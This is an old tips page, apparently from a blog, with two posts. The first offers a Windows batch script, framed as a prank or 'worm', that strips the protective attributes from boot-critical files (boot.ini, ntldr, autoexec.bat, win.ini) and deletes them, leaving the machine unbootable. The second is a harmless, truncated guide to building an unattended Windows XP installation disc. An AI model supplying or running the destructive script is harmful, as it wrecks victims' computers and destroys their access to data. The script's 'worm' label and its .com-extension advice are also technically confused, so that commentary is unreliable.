Sat Sep 27, 08 04:55 AM
| Category:
All
How to shut down a computer FOREVER!
CODE
echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
// note save the above code as .com extension this is actually a worm and //shut down the xp such that boot strap loader will never be able to conduct //the initialization of os untill a new os is installed
Sat Sep 27, 08 04:48 AM
| Category:
All
Automate Installation of XP
You can create a CD that can install Windows XP automatically, putting in all the details and answering all the dialog boxes.
The secret behind this is the answer file, which tells Windows what to do while it's installing. The answer file can be created using Windows setup manager.
Using this tool, you can make the answer file so powerful that you can even tell Windows to include or exclude individual components, set the display resolution, and more.
Here's the Steps involved in creating XP Automated Installation Disc:
Step 1: To begin with, insert your Windows XP installation CD into the drive and copy the entire contents of the CD to a new folder on your hard disk.
Step 2: Navigate to the Support > Tools folder on the CD and double-click the Deploy.cab file. Copy all the files to a new folder on your hard disk.
Step 3: The crucial part begins now, creating the answer file. To execute the windows setup manager, double click the Setupmgr.exe file from......